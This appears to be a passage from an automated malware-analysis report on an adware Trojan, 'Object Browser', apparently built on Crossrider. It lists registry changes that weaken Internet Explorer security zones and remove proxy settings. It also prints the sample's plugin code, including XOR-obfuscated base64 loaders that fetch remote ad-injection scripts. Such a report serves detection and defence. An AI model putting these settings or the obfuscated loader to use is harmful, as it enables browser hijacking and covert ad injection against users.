    [HKCU\Software\Sense\Db\Internal\monetization_plugin_bundledUrls]
    "Expiration" = "1896127200"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_monetization_plugins_delay]
    "Expiration" = "1717268198"

    [HKCU\Software\Sense\Db\Internal\Resources_appVer]
    "Value" = "61"

    [HKCU\Software\Sense\Db\Internal\Resources_nextCheck]
    "Expiration" = "1401929797"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Personal" = "%Documents and Settings%\%current user%\My Documents"

    [HKCU\Software\Sense\Db\Internal\Resources_lastVersion]
    "Expiration" = "1896127200"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_plugins_version_]
    "Value" = "25"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Sense\Db\Internal\monitor.onRequest]
    "Expiration" = "1896127200"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_stats_]
    "Value" = "{""bic"":""4252D7B4B8E54E2E95F19018ADCF24D9IE""

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKCU\Software\Sense\Db\Internal\Resources_meta]
    "Value" = "{}"

    [HKCU\Software\Sense\Db\Internal\Resources_appVer]
    "Expiration" = "1896127200"

    [HKCU\Software\Sense\Db\Internal\monitor.onBeforeNavigate]
    "Expiration" = "1896127200"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_is_install_reported_]
    "Value" = "true"

    [HKCU\Software\Crossrider\onRequest]
    "48292" = ""

    [HKCU\Software\Sense\Db\Internal\Resources_meta]
    "Expiration" = "1896127200"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_override_verticals]
    "Expiration" = "1717268198"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_last_report_errors]
    "Value" = "{}"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060420140605]
    "CacheRepair" = "0"

    [HKCU\Software\Sense\background]
    "IsEnabled" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060420140605]
    "CachePrefix" = ":2014060420140605:"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_monetization_plugins_ids]
    "Value" = "[102,180,184,191,192,223,242,263]"

    [HKCU\Software\Sense\Db\Internal\Resources_lastVersion]
    "Value" = "0"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Sense\Db\Internal\monitor.onBeforeNavigate]
    "Value" = "false"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Db\Internal\monetization_plugin_bundledUrls]
    "Value" = "{""dealply_s"":{""urls"":[""ssfiles.com""]},""dealply_p"":{""urls"":[""i_crdrjs_info""

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Sense\background]
    "__onDocumentStart_script_store__" = ""

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_lastUpdate]
    "Value" = "1401908197838"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_monetization_plugins_ids]
    "Expiration" = "1717268198"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_lastUpdate]
    "Expiration" = "1717268197"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_firstRun]
    "Value" = "false"

    [HKCU\Software\Sense\Db\Internal\Resources_queue]
    "Expiration" = "1896127200"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060420140605]
    "CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014060420140605\"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "53 B9 C6 F4 D9 BC DE 48 43 C4 FA A7 05 8D 36 86"

    [HKCU\Software\Sense\Db\Internal\monitor.onRedirect]
    "Expiration" = "1896127200"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_is_install_reported_]
    "Expiration" = "1717268197"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060420140605]
    "CacheOptions" = "11"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\Sense\Db\Internal\monetization_plugin_notBundledArr_]
    "Expiration" = "1896127200"

    [HKCU\Software\Sense\Db\Internal\monitor.onRedirect]
    "Value" = "false"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_monetization_plugins_delay]
    "Value" = "{102:0,180:0,184:0,191:0,192:0,223:0,242:0,263:0}"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_last_report_errors]
    "Expiration" = "1717268208"

    [HKCU\Software\Sense\Db\Async-Internal\monetization_plugin_firstRun]
    "Expiration" = "1717268198"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process cr.exe:2984 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "49 08 65 DF 26 B6 C6 D5 5F 9A 00 B2 E4 1B ED 36"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    The process Object Browser-codedownloader.exe:600 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\Object Browser\Plugins\223]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM2MDYyNDgwNTEyMWUwOTJjMTkxYjQ4NTE0YTRmMGUxZTBkMDk1MTU4NDUwODBlMDM0ODFjMTAwYTBhMTMwZTQ1MDkwMjBiNDUwYTFhMTkxZTFhMWY0NTVjNTI1ZjRmNGU1YzQ1NWY1YzVjNTg0OTFhMGIxYzA3MTgwYjBmNDQwNzE1NTUwYTBjMDkxZTBlNTYzNTMyMjUzODM2MmEzODI1MjMyZjJmM2YzOTM5MmMzYjM0M2UyZTM0MzU0ZjRhNjA3MDViMWIxYjFmMGMwMzAzMmYwZTViNDM0YjQ1NTg1ODQ2Njc0NjRhNTk1OTQ5MDEwZjE5MWUwNDA1MGIxNTViNTE1NzMxNDkxOTA1MDkxYTA5MTAwNTEwNDgzNjYwMTA=', 'wjkjmfjyyk'); }"

    [HKCU\Software\Object Browser\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b\D"

    [HKLM\SOFTWARE\Object Browser\IE]
    "TotalProfiles" = "1"

    [HKCU\Software\Object Browser\Plugins\7]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\217]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[217]=function(){var a=(function(e){String.prototype.replaceAll=function(h,g){return this.split(h).join(g);};var d=e(window);e.fn.visible=function(g,B,G){if(this.length<1){return;}var C=this.length>1?this.eq(0):this,u=C.get(0),v=d.width(),k=d.height(),G=(G)?G:both,l=B===true?u.offsetWidth*u.offsetHeight:true;if(typeof u.getBoundingClientRect===function){var p=u.getBoundingClientRect(),I=p.top>=0&&p.top0&&p.bottom<=k,D=p.left>=0&&p.left0&&p.right<=v,h=g?I||n:I&&n,x=g?D||D:D&&y;if(G===both){return l&&h&&x;}else{if(G===vertical){return l&&h;}else{if(G===horizontal){return l&&x;}}}}else{var w=d.scrollTop(),q=w k,F=d.scrollLeft(),H=F v,m=C.offset(),z=m.top,A=z C.height(),E=m.left,s=E C.width(),i=g===true?A:z,j=g===true?z:A,r=g===true?s:E,o=g===true?E:s;if(G===both){return !!l&&"

    [HKCU\Software\Object Browser\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\Object Browser\Plugins\36]
    "Name" = "IEBackground"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Object Browser\Plugins\1]
    "Name" = "base"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Object Browser\Plugins\40]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\Object Browser\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\Object Browser\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\Object Browser\Plugins\104]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

    [HKCU\Software\Object Browser\Installer]
    "DefaultBrowser" = "ie"

    [HKCU\Software\Object Browser\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\Object Browser\Plugins\14]
    "Version" = "11"

    [HKCU\Software\Object Browser\Plugins\184]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE2ZjYwNGIwMjAzMTMxMzIyMTQxNjQ3NTM0OTQ4MWYxMzE3MDc1YzU1NGEwNzE5MTk1OTA5MGMwNzE0MTUwNzA1MGMwNzA3MTcwMDU5MDUxNTA4NDYwNzFhMDQwNTRjMWIwOTFkMGMwYTQ3MDAwNDU4MmMwNTBmMWQwYzA3MjAwZTRhMjI1YjM2NTIzYjU3NWEyODQ3MzU1NzUwNDM0YjNmNTc1ODU4NDczNjVlMjI0NzRiNGE1NTU4NWM1YjQwMjM1MjQ3MjA0YzIwNGYzYTAzMDMwMjJhMTM1YjI5MDQwNTBjMTk1MTM3MDIwNTEyMTQwMDFiMjAyZTRhNTU1MzQ3NTY0YTQzMzkxYjA1MTMxMjAwMDMyODFiMDgwYzU0MzUyODI0MzEzODM1MjkzNzIwMmQyZjI1MzgyMjI3MzYyNTJiMjgyNDJmMjgzODQ1MjMwOTE1MDkwYjA4MTgzZTAzNWUyODM5MzkzNzI2M2EzOTI1MmUyNzMyMzQyNTM2M2MyYjM1M2UyMzNjMjg0NDU2NmY2MDRiMDIwMzEzMTMwNDMzMDgwOTRiNTM0YTU1MGYxNzAzMTYwOTVmNDY0NjA0MDcxNDRkMTkwOTBhMTcwNjBiMDYxMjBhMTMwNzA1NTQwNjA2MDQ0NTE5MTcxMDE1NDkxNjBhMGUwMDA5NTkwZDEwNDgyOTA4MGMwZTAwMDQzZTAzNWUzMjVlM2I1MTI4NWI1OTM2NGEyMTQ3NTU0ZTQ4MmM1YjViNDY0YTIyNGUyNzRhNDg1OTU5NWI0MjU2NTQzMzU3NGEyMzVmMmM0YzI0MGUxNzEyMmYxZTU4M2EwODA2MTIxNDQ1MjcwNzA4MTEwNzBjMTgzZTIzNWU0NTU2NGE1NTU5NGYzYTA1MDgwNzAyMDUwZTJiMDgwNDBmNGEzODNjMzQzNDM1MzYzYTNiMjMzMzIyMzEyODI3MmEzNTM2MjcyYjNhMjID"

    [HKCU\Software\Object Browser\Plugins\246]
    "JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDERD"

    [HKCU\Software\Object Browser\Plugins\4]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\Object Browser\Plugins\217]
    "Name" = "similar_products_m"

    [HKCU\Software\Object Browser\Plugins\244]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\207]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el"

    [HKCU\Software\Crossrider]
    "Verifier" = "1121c510e5f38d154df47b19458d540e"

    [HKCU\Software\Object Browser\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\Object Browser\Manifest]
    "Name" = "Object Browser"

    [HKCU\Software\Object Browser\Installer]
    "Params" = "{ source_id : 000046, sub_id : 0, uzid : 0"
    "ErrorsDomain" = "http://errors.clientstatsservice.com"

    [HKCU\Software\Object Browser\Plugins\183]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\45]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n"

    [HKCU\Software\Object Browser\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\Object Browser\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\Object Browser\Plugins\9]
    "Version" = "3"

    [HKCU\Software\Object Browser\Plugins\180]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/bpo_serp_m.js"

    [HKCU\Software\Object Browser\Plugins\207]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/dbWrapper.js"

    [HKCU\Software\Object Browser\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Object Browser\Plugins\13]
    "Version" = "7"

    [HKCU\Software\Object Browser\Plugins\42]
    "Version" = "9"

    [HKCU\Software\Object Browser\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){93"

    [HKCU\Software\Object Browser\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\Object Browser\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\Object Browser\Plugins\223]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\Object Browser\Plugins\104]
    "Version" = "9"

    [HKCU\Software\Object Browser\Plugins\244]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2ZDZkNGIxYTFjMDUxYjIyMDAwOTQ1NWU0OTUwMDAwNTFmMDc0ODRhNDgwMTExMDY1OTVmMGUxOTE1MDQwMDAxMTAxMzQ2MTIwNDFhNWQxMjBlMDAwZTE3MWM1ZTAyMTkxODAwMDQxMDM2MDExODEwMTkxYzVkMGMwOTBlMzYwMTE4MDMwMDI4MDExMTA2MTYxZDE3MWE1ZjAxMDQ0ZDE1MGUwMDU0M2UzYzM0MTgzODM2MjQ1NjJiMmQyMzFiM2MwMTEwNDEyODBkMmQxYTNjMmMxMjVmMzgyNjI0NDI1NzJkNTQxYjA0MDkxZTE2NTgzODNiMmEyMDI3MjIzODI1M2IyMTIyMzYzNjIxM2QzMzM0M2UzNjNhMzg0NjQ1Nzg2MTUzMWIxYjA3MDIwZTBhMjAxNjRhNGI0YjQ1NDY1MTZkMTk=', 'egdirhqkwr'); }"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Object Browser\Plugins\13]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderAppUtils.js"

    [HKCU\Software\Object Browser\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
    [HKCU\Software\Object Browser\Plugins\39]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=px3"

    [HKCU\Software\Object Browser\Plugins\38]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IECallbacks.js"

    [HKCU\Software\Object Browser\Plugins\43]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\244]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/engageya_inner_m.js"

    [HKCU\Software\Object Browser\Installer]
    "zdata" = "0"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Object Browser\Manifest]
    "homepageurl" = "NA"

    [HKCU\Software\Object Browser\Plugins\72]
    "Version" = "5"

    [HKCU\Software\Object Browser\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\Object Browser\Plugins\244]
    "Name" = "engageya_inner_m"

    [HKCU\Software\Object Browser\Plugins\21]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/debug.js"

    [HKCU\Software\Object Browser\Plugins\184]
    "Version" = "9"

    [HKCU\Software\Object Browser\Plugins\180]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk3YjY2NDUxMjExMTcwMzM5MDIwZTUzNTU0NzU4MGQxNzA3MWM0YTRkNWUwZTAzMDk0YjE3MTUxNDE5MTM1ZjBjMDgxNzRhMDI1ZDFjMTgxMjRlNTk1NTRjMTcwNjE1NWU0ZDNkMmUyYzM1MzUzNjMwMjEyNTM0MjcyMzMwMzQyZjI3M2MzYTI4MmYzZDU3NTk1NTRjMmIwMjFlMDk0ZDNkMmUyYzM1MzUzNjMwMjEyNTM0MjcyMzMwMjYyYTM1M2MzZDJkM2QyNzJlMzA0MTRjNTc1NTAxMDkxNjUxNGMzMDM4MzkzNzJjMjAzZjIyMmIzNTJhMzUyNTMwMzAzNjNlMmYyYjM1MzAzODVjNTM1MTQ1MWUxNTA0NDA1MjUxNDk1MjUxNDUwYTQ3NTE0NjVjNTA0ODUzNWE0NTU4NDY1NzQ2NWQ0MTBlMDAwYTE3NTEyZjNkMzIzZDI4MjkzNjMxM2EyODM1MzAyZTJlMzcyYTNhMmEzNzMzMmY0NDA1MWEwZTFlNTgzYzJjMmYyMjJkMjIzYzM1MzMyMTI2MjEzMzM5MmMyMjNiMjYzNjI5MjYyMTMzMjUzMTM0M2QzODMzMjEzYzJjNGU1YzY4Nzg0ZDBmMGUxMTEzMDAzOTAyMGU1MzU1NDc1ODBkMTcwNzFjMDM1ODVlNDAwNjFlMTY0ZDA3MGEwODBiMDA0MTA0MTUwODRjMTI0MjAwMGEwMTUwNTE0ODUzMTExNjBhNDI1ZjJlMzAyNDI4MmEzMDIwM2UzOTI2MzQzZDM4MjkzMDIxMmMyNTM0M2QyZTQ5NTE0ODUzMmQxMjAxMTU1ZjJlMzAyNDI4MmEzMDIwM2UzOTI2MzQzZDM4M2IzNTMzMmMyMjMxMmYzNDMwMzg1YzUzNTE0NTFlMTUwNDQyNTIzODI1MjYzMTNjM2YyMzMwMzgyYjIyMjgzYTM2MjAyOTIyM2QzODJiMzgyNTQzNTUD"

    [HKCU\Software\Object Browser\Manifest]
    "Description" = "Browser enhancer"

    [HKCU\Software\Object Browser\Plugins\93]
    "Version" = "10"

    [HKCU\Software\Object Browser\Plugins\36]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBackground.js"

    [HKCU\Software\Object Browser\Plugins\46]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IETimers.js"

    [HKCU\Software\Object Browser\Plugins\64]
    "Version" = "3"

    [HKCU\Software\Object Browser\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\Object Browser\Plugins\41]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInfo.js"

    [HKCU\Software\Object Browser\Plugins\1]
    "JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});D"

    [HKCU\Software\Object Browser\Plugins\72]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiValidation.js"

    [HKCU\Software\Object Browser\Plugins\94]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\242]
    "Version" = "3"

    [HKCU\Software\Object Browser\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\Object Browser\Plugins\91]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/monetizationLoader.js"

    [HKCU\Software\Object Browser\Plugins\102]
    "Version" = "7"

    [HKCU\Software\Object Browser\Manifest]
    "Version" = "197"

